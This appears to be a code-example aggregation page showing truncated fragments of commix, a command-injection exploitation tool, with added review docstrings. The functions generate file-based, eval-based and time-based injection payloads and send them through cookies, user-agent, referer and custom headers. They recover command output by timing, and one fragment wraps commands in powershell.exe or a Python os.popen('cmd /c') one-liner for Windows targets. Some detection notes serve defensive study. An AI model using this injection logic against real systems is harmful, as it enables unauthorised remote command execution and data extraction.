          if not settings.LOAD_SESSION:
            i = i + 1
            # The output file for file-based injection technique.
            OUTPUT_TEXTFILE = TAG + ".txt"    
            # Check for bad combination of prefix and separator
            combination = prefix + separator
            if combination in settings.JUNK_COMBINATION:
              prefix = ""

            try:
              # File-based decision payload (check if host is vulnerable).
              if alter_shell :
                payload = fb_payloads.decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE)
              else:
                payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE)
                      
              # Check if defined "--prefix" option.
              # Fix prefixes / suffixes
              payload = parameters.prefixes(payload, prefix)
              payload = parameters.suffixes(payload, suffix)

              # Whitespace fixation
              payload = payload.replace(" ", whitespace)

              # Perform payload modification
              payload = checks.perform_payload_modification(payload)

              # Check if defined "--verbose" option.
              if settings.VERBOSITY_LEVEL == 1:
                # Escape newlines so the payload prints on a single line.
                payload_msg = payload.replace("\n", "\\n")
                print settings.print_payload(payload_msg)
              # Check if defined "--verbose" option.
              # NOTE(review): at this level the payload is printed without the
              # newline escaping used one branch above.
              elif settings.VERBOSITY_LEVEL > 1:
                info_msg = "Generating a payload for injection..."
                print settings.print_info_msg(info_msg)
                print settings.print_payload(payload) 

              # Cookie Injection
              if settings.COOKIE_INJECTION == True:
                # Check if target host is vulnerable to cookie header injection.
                vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
                response = fb_injector.cookie_injection_test(url, vuln_parameter, payload)
#......... part of the code is omitted here .........
开发者ID:security-geeks,项目名称:commix,代码行数:101,代码来源:fb_handler.py

示例12: false_positive_check

def false_positive_check(separator, TAG, cmd, prefix, suffix, whitespace, delay, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, randvcalc, alter_shell, how_long, url_time_response):
  """Re-test a suspected injection point with a second round of timed requests.

  Visible flow (the listing is cut off before the function returns, so the
  return value is not shown):

    1. For output_length 1 and 2, build a command-execution payload with
       tfb_payloads, apply prefix/suffix, replace spaces with `whitespace`,
       optionally base64-encode it, and send it through whichever channel
       carries settings.INJECT_TAG (cookie, user-agent, referer, custom
       header), otherwise through examine_requests().
    2. A length is accepted only when the value returned for the request is
       at least settings.FOUND_HOW_LONG and exceeds `delay` by at least
       settings.FOUND_DIFF.
    3. When a length was accepted, a second nested loop sends
       tfb_payloads.fp_result* payloads for each position / candidate value.

  The `how_long` argument is overwritten by the first request. `TAG` and
  `randvcalc` are not used in the visible part.

  NOTE(review): the verdict in step 2 rests on response latency alone
  (how_long is presumably elapsed seconds -- confirm against the *_test
  helpers), which is why a confirmation pass like this one exists.
  """

  found_chars = False
  # Announce the re-test when "--verbose" is set.
  if settings.VERBOSITY_LEVEL >= 1: 
    info_msg = "Testing the reliability of used payload... "
    sys.stdout.write(settings.print_info_msg(info_msg))
    sys.stdout.flush()  

  # Phase 1: try candidate output lengths 1 and 2.
  for output_length in range(1, 3):

    # Execute shell commands on vulnerable host.
    if alter_shell :
      payload = tfb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method)
    else:
      payload = tfb_payloads.cmd_execution(separator, cmd, output_length, OUTPUT_TEXTFILE, delay, http_request_method)

    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    # Whitespace fixation
    payload = re.sub(" ", whitespace, payload)

    # Optional base64 tamper step, applied after whitespace substitution.
    if settings.TAMPER_SCRIPTS['base64encode']:
      payload = base64.b64encode(payload)

    # Check if defined "--verbose" option.
    # Newlines are escaped so the payload is shown on a single line.
    if settings.VERBOSITY_LEVEL >= 1:
      payload_msg = payload.replace("\n", "\\n") 
      sys.stdout.write("\n" + settings.print_payload(payload_msg))
 
    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      how_long = cookie_injection_test(url, vuln_parameter, payload)

    # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      how_long = user_agent_injection_test(url, vuln_parameter, payload)

    # Check if defined referer with "INJECT_HERE" tag
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      how_long = referer_injection_test(url, vuln_parameter, payload)

    # Check if defined custom header with "INJECT_HERE" tag
    elif settings.CUSTOM_HEADER_INJECTION:
      how_long = custom_header_injection_test(url, vuln_parameter, payload)

    else:
      how_long = examine_requests(payload, vuln_parameter, http_request_method, url, delay, url_time_response)

    # Accept only when the returned value clears the absolute threshold and
    # also exceeds the requested delay by the configured margin.
    if (how_long >= settings.FOUND_HOW_LONG) and (how_long - delay >= settings.FOUND_DIFF):
      found_chars = True
      break

  # Phase 2: runs only when phase 1 accepted a length.
  if found_chars == True :
    num_of_chars = output_length + 1
    # check_start is zeroed and then set to the current time; check_end is
    # only initialised in the visible part.
    check_start = 0
    check_end = 0
    check_start = time.time()
    
    output = [] 
    percent = 0
    # The loop variable reuses the name of its own upper bound; range() is
    # evaluated once, before the name is rebound.
    for num_of_chars in range(1, int(num_of_chars)):
      for ascii_char in range(1, 3):
 
        # Get the execution output, of shell execution.
        # Unlike the alter-shell variant, fp_result is not passed num_of_chars.
        if alter_shell:
          payload = tfb_payloads.fp_result_alter_shell(separator, OUTPUT_TEXTFILE, num_of_chars, ascii_char, delay, http_request_method)
        else:
          payload = tfb_payloads.fp_result(separator, OUTPUT_TEXTFILE, ascii_char, delay, http_request_method)

        # Fix prefixes / suffixes
        payload = parameters.prefixes(payload, prefix)
        payload = parameters.suffixes(payload, suffix)        

        # Whitespace fixation
        payload = re.sub(" ", whitespace, payload)

        # Optional base64 tamper step, as in phase 1.
        if settings.TAMPER_SCRIPTS['base64encode']:
          payload = base64.b64encode(payload)

        # Check if defined "--verbose" option.
        if settings.VERBOSITY_LEVEL >= 1:
          payload_msg = payload.replace("\n", "\\n") 
          sys.stdout.write("\n" + settings.print_payload(payload_msg))

        # Check if defined cookie with "INJECT_HERE" tag
        if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
          how_long = cookie_injection_test(url, vuln_parameter, payload)

        # Check if defined user-agent with "INJECT_HERE" tag
        elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
          how_long = user_agent_injection_test(url, vuln_parameter, payload)

        # Check if defined referer with "INJECT_HERE" tag
        elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
          how_long = referer_injection_test(url, vuln_parameter, payload)

        # Check if defined custom header with "INJECT_HERE" tag
        elif settings.CUSTOM_HEADER_INJECTION:
#.........这里部分代码省略.........
开发者ID:BMaChina,项目名称:commix,代码行数:101,代码来源:tfb_injector.py

示例13: eb_injection_handler

def eb_injection_handler(url, delay, filename, http_request_method):
  """Probe `url` with eval-based code-injection decision payloads.

  Side effects visible here: every entry of settings.EXECUTION_FUNCTIONS is
  rewritten in place to "${" + entry + "(" and the rewritten list is then
  concatenated onto settings.EVAL_PREFIXES, so both settings are altered by
  each call. `url` is replaced by the return value of
  eb_injector.warning_detection().

  The nested loops walk every whitespace / prefix / suffix / separator
  combination taken from settings. Each fresh attempt (no loaded session)
  gets a new random six-letter TAG and two random integers below 100; per
  the original comment the TAG changes on every request to prevent
  false-positive results.

  The listing is cut off inside the injection-channel dispatch, so response
  handling and the return value are not shown.
  """

  # Bookkeeping and report labels; their use lies outside the visible part.
  counter = 1
  vp_flag = True
  no_result = True
  export_injection_info = False
  injection_type = "Results-based Command Injection"
  technique = "eval-based code injection technique"

  # In-place rewrite of the shared settings list (see docstring).
  for item in range(0, len(settings.EXECUTION_FUNCTIONS)):
    settings.EXECUTION_FUNCTIONS[item] = "${" + settings.EXECUTION_FUNCTIONS[item] + "("
  settings.EVAL_PREFIXES = settings.EVAL_PREFIXES + settings.EXECUTION_FUNCTIONS

  url = eb_injector.warning_detection(url, http_request_method)
  
  # Progress message, skipped when a stored session is being loaded.
  if not settings.LOAD_SESSION:
    info_msg = "Testing the " + technique + "... "
    sys.stdout.write(settings.print_info_msg(info_msg))
    sys.stdout.flush()

  i = 0
  # Calculate all possible combinations
  total = len(settings.WHITESPACE) * len(settings.EVAL_PREFIXES) * len(settings.EVAL_SEPARATORS) * len(settings.EVAL_SUFFIXES)
  for whitespace in settings.WHITESPACE:
    for prefix in settings.EVAL_PREFIXES:
      for suffix in settings.EVAL_SUFFIXES:
        for separator in settings.EVAL_SEPARATORS:

          # If a previous session is available.
          # The stored injection point replaces the loop variables and the
          # function arguments for this iteration.
          if settings.LOAD_SESSION and session_handler.notification(url, technique):
            url, technique, injection_type, separator, shell, vuln_parameter, prefix, suffix, TAG, alter_shell, payload, http_request_method, url_time_response, delay, how_long, output_length, is_vulnerable = session_handler.injection_point_exportation(url, http_request_method)
            checks.check_for_stored_tamper(payload)
            
          # A pending retest is handed to the classic handler once, then the
          # flag is cleared. The import is local to this branch.
          if settings.RETEST == True:
            settings.RETEST = False
            from src.core.injections.results_based.techniques.classic import cb_handler
            cb_handler.exploitation(url, delay, filename, http_request_method)
            
          if not settings.LOAD_SESSION:
            i = i + 1
            # Check for bad combination of prefix and separator
            combination = prefix + separator
            if combination in settings.JUNK_COMBINATION:
              prefix = ""

            # Change TAG on every request to prevent false-positive results.
            TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))

            # Two random operands and their sum; the consumer of randvcalc is
            # outside the visible part.
            randv1 = random.randrange(100)
            randv2 = random.randrange(100)
            randvcalc = randv1 + randv2

            # Define alter shell
            alter_shell = menu.options.alter_shell

            try:
              if alter_shell:
                # Classic -alter shell- decision payload (check if host is vulnerable).
                payload = eb_payloads.decision_alter_shell(separator, TAG, randv1, randv2)
              else:
                # Classic decision payload (check if host is vulnerable).
                payload = eb_payloads.decision(separator, TAG, randv1, randv2)

              suffix = urllib.quote(suffix)
              # Fix prefixes / suffixes
              payload = parameters.prefixes(payload, prefix)
              payload = parameters.suffixes(payload, suffix)

              # Fixation for specific payload.
              # Drops the encoded ";" (%3B) that sits between ")" and the
              # quoted ")}" tail, then appends TAG.
              if ")%3B" + urllib.quote(")}") in payload:
                payload = payload.replace(")%3B" + urllib.quote(")}"), ")" + urllib.quote(")}"))
              payload = payload +  TAG + ""

              # Whitespace fixation
              payload = re.sub(" ", whitespace, payload)

              # Either hand the payload to the base64 tamper module or
              # percent-encode any spaces that remain.
              if settings.TAMPER_SCRIPTS['base64encode']:
                from src.core.tamper import base64encode
                payload = base64encode.encode(payload)
              else:
                payload = re.sub(" ", "%20", payload)

              # Check if defined "--verbose" option.
              if settings.VERBOSITY_LEVEL >= 1:
                sys.stdout.write("\n" + settings.print_payload(payload))

              # Cookie Injection
              if settings.COOKIE_INJECTION == True:
                # Check if target host is vulnerable to cookie injection.
                vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
                response = eb_injector.cookie_injection_test(url, vuln_parameter, payload)

              # User-Agent Injection
              elif settings.USER_AGENT_INJECTION == True:
                # Check if target host is vulnerable to user-agent injection.
                vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
                response = eb_injector.user_agent_injection_test(url, vuln_parameter, payload)

              # Referer Injection
              elif settings.REFERER_INJECTION == True:
#.........这里部分代码省略.........
开发者ID:HugoDelval,项目名称:commix,代码行数:101,代码来源:eb_handler.py

示例14: fb_injection_handler


#.........这里部分代码省略.........
 
        # Fragment of fb_injection_handler: the function header and the
        # enclosing loops are not shown in this listing. For each fresh
        # attempt (no loaded session) it builds a file-based decision payload,
        # sends it through the selected injection channel, and then calls
        # fb_injector.injection_output() for the marker file.
        if not settings.LOAD_SESSION:
          i = i + 1
          # Change TAG on every request to prevent false-positive results.
          TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6)) 
          # The output file for file-based injection technique.
          # Detection note: the marker is named <six uppercase letters>.txt
          # and, per the verbose message below, is written under
          # settings.SRV_ROOT_DIR -- an unexpected file of that shape in a
          # web-served directory is a host-side artifact of this check.
          OUTPUT_TEXTFILE = TAG + ".txt"    
          # Check for bad combination of prefix and separator
          combination = prefix + separator
          if combination in settings.JUNK_COMBINATION:
            prefix = ""

          try:
            # File-based decision payload (check if host is vulnerable).
            if alter_shell :
              payload = fb_payloads.decision_alter_shell(separator, TAG, OUTPUT_TEXTFILE)
            else:
              payload = fb_payloads.decision(separator, TAG, OUTPUT_TEXTFILE)
                    
            # Check if defined "--prefix" option.
            # Fix prefixes / suffixes
            payload = parameters.prefixes(payload, prefix)
            payload = parameters.suffixes(payload, suffix)

            # Optional base64 encoding of the whole payload.
            if menu.options.base64:
              payload = base64.b64encode(payload)

            # Check if defined "--verbose" option.
            # Newlines are escaped so the payload prints on a single line.
            if menu.options.verbose:
              info_msg = "Trying to upload the '" + OUTPUT_TEXTFILE
              info_msg += "' file on '" + settings.SRV_ROOT_DIR + "'..."
              print settings.print_info_msg(info_msg)
              payload_msg = payload.replace("\n", "\\n")
              print settings.print_payload(payload_msg)

            # Cookie Injection
            if settings.COOKIE_INJECTION == True:
              # Check if target host is vulnerable to cookie injection.
              vuln_parameter = parameters.specify_cookie_parameter(menu.options.cookie)
              response = fb_injector.cookie_injection_test(url, vuln_parameter, payload)

            # User-Agent Injection
            elif settings.USER_AGENT_INJECTION == True:
              # Check if target host is vulnerable to user-agent injection.
              vuln_parameter = parameters.specify_user_agent_parameter(menu.options.agent)
              response = fb_injector.user_agent_injection_test(url, vuln_parameter, payload)          

            # Referer Injection
            elif settings.REFERER_INJECTION == True:
              # Check if target host is vulnerable to referer injection.
              vuln_parameter = parameters.specify_referer_parameter(menu.options.referer)
              response = fb_injector.referer_injection_test(url, vuln_parameter, payload)

            # Custom HTTP header Injection
            elif settings.CUSTOM_HEADER_INJECTION == True:
              # Check if target host is vulnerable to custom http header injection.
              vuln_parameter = parameters.specify_custom_header_parameter(settings.INJECT_TAG)
              response = fb_injector.custom_header_injection_test(url, vuln_parameter, payload)

            else:
              # Check if target host is vulnerable.
              # Only this branch also returns the vulnerable parameter name.
              response, vuln_parameter = fb_injector.injection_test(payload, http_request_method, url)

            # Find the directory.
            # The pause of `delay` seconds happens after the lookup.
            output = fb_injector.injection_output(url, OUTPUT_TEXTFILE, delay)
            time.sleep(delay)
开发者ID:ardiansn,项目名称:commix,代码行数:67,代码来源:fb_handler.py

示例15: false_positive_check

def false_positive_check(separator, TAG, cmd, whitespace, prefix, suffix, timesec, http_request_method, url, vuln_parameter, randvcalc, alter_shell, how_long, url_time_response):
  """Re-test a time-based result to rule out a false positive.

  Visible flow (the listing is cut off before the function returns, so the
  return value is not shown):

    1. On Windows targets `cmd` is wrapped in a command that prints the
       length of the stripped output (via settings.WIN_PYTHON_DIR when
       alter_shell is set, otherwise via powershell.exe); the original is
       kept in previous_cmd and restored before phase 2.
    2. `timesec` is increased by a random 1-5 seconds.
    3. For output_length 1 and 2, a tb_payloads command-execution payload is
       built, given its prefix/suffix, whitespace substitution and
       checks.perform_payload_modification(), then sent through whichever
       channel carries settings.INJECT_TAG (cookie, user-agent, referer,
       host, custom header), otherwise through examine_requests().
    4. A length is accepted only when the value returned for the request is
       at least settings.FOUND_HOW_LONG and exceeds `timesec` by at least
       settings.FOUND_DIFF; phase 2 then sends tb_payloads.fp_result*
       payloads for each position and for candidate values 1..19.

  The `how_long` argument is overwritten by the first request. `TAG` and
  `randvcalc` are not used in the visible part.

  Detection note: because of step 2 the delay differs from call to call, so
  a rule keyed to one fixed sleep value will not match these requests.
  """

  # Windows targets: measure the output length with a wrapper command and
  # remember the original command for phase 2.
  if settings.TARGET_OS == "win":
    previous_cmd = cmd
    if alter_shell:
      cmd = settings.WIN_PYTHON_DIR + " -c \"import os; print len(os.popen('cmd /c " + cmd + "').read().strip())\""
    else: 
      cmd = "powershell.exe -InputFormat none write-host ([string](cmd /c " + cmd + ")).trim().length"

  found_chars = False
  info_msg = "Checking the reliability of the used payload "
  info_msg += "in case of a false positive result... "
  # Level 1 writes the message without a newline; higher levels print it.
  if settings.VERBOSITY_LEVEL == 1: 
    sys.stdout.write(settings.print_info_msg(info_msg))
    sys.stdout.flush()
  # Check if defined "--verbose" option.
  elif settings.VERBOSITY_LEVEL > 1:
    print settings.print_info_msg(info_msg)

  # Varying the sleep time.
  timesec = timesec + random.randint(1, 5)

  # Checking the output length of the used payload.
  for output_length in range(1, 3):
    # Execute shell commands on vulnerable host.
    if alter_shell:
      payload = tb_payloads.cmd_execution_alter_shell(separator, cmd, output_length, timesec, http_request_method)
    else:
      payload = tb_payloads.cmd_execution(separator, cmd, output_length, timesec, http_request_method)
    
    # Fix prefixes / suffixes
    payload = parameters.prefixes(payload, prefix)
    payload = parameters.suffixes(payload, suffix)

    # Whitespace fixation
    payload = payload.replace(" ", whitespace)

    # Perform payload modification
    payload = checks.perform_payload_modification(payload)

    # Check if defined "--verbose" option.
    # Newlines are escaped so the payload prints on a single line.
    if settings.VERBOSITY_LEVEL == 1:
      payload_msg = payload.replace("\n", "\\n") 
      sys.stdout.write("\n" + settings.print_payload(payload_msg))
    # Check if defined "--verbose" option.
    elif settings.VERBOSITY_LEVEL > 1:
      info_msg = "Generating a payload for testing the reliability of used payload..."
      print settings.print_info_msg(info_msg)
      payload_msg = payload.replace("\n", "\\n") 
      sys.stdout.write(settings.print_payload(payload_msg) + "\n")

    # Check if defined cookie with "INJECT_HERE" tag
    if menu.options.cookie and settings.INJECT_TAG in menu.options.cookie:
      how_long = cookie_injection_test(url, vuln_parameter, payload)

    # Check if defined user-agent with "INJECT_HERE" tag
    elif menu.options.agent and settings.INJECT_TAG in menu.options.agent:
      how_long = user_agent_injection_test(url, vuln_parameter, payload)

    # Check if defined referer with "INJECT_HERE" tag
    elif menu.options.referer and settings.INJECT_TAG in menu.options.referer:
      how_long = referer_injection_test(url, vuln_parameter, payload)

    # Check if defined host with "INJECT_HERE" tag
    elif menu.options.host and settings.INJECT_TAG in menu.options.host:
      how_long = host_injection_test(url, vuln_parameter, payload)

    # Check if defined custom header with "INJECT_HERE" tag
    elif settings.CUSTOM_HEADER_INJECTION:
      how_long = custom_header_injection_test(url, vuln_parameter, payload)

    else:  
      how_long = examine_requests(payload, vuln_parameter, http_request_method, url, timesec, url_time_response)

    # Accept only when the returned value clears the absolute threshold and
    # also exceeds the (jittered) delay by the configured margin.
    if (how_long >= settings.FOUND_HOW_LONG) and (how_long - timesec >= settings.FOUND_DIFF):
      found_chars = True
      break

  # Phase 2: runs only when a length was accepted above.
  if found_chars == True :
    # Restore the unwrapped command on Windows targets.
    if settings.TARGET_OS == "win":
      cmd = previous_cmd
    num_of_chars = output_length + 1
    # check_start is zeroed and then set to the current time; check_end is
    # only initialised in the visible part.
    check_start = 0
    check_end = 0
    check_start = time.time()
    
    output = []
    percent = 0
    sys.stdout.flush()

    is_valid = False
    # The loop variable reuses the name of its own upper bound; range() is
    # evaluated once, before the name is rebound.
    for num_of_chars in range(1, int(num_of_chars)):
      for ascii_char in range(1, 20):

        if alter_shell:
          # Get the execution output, of shell execution.
          payload = tb_payloads.fp_result_alter_shell(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method)
        else:
          # Get the execution output, of shell execution.
          payload = tb_payloads.fp_result(separator, cmd, num_of_chars, ascii_char, timesec, http_request_method)
#.........这里部分代码省略.........
开发者ID:security-geeks,项目名称:commix,代码行数:101,代码来源:tb_injector.py

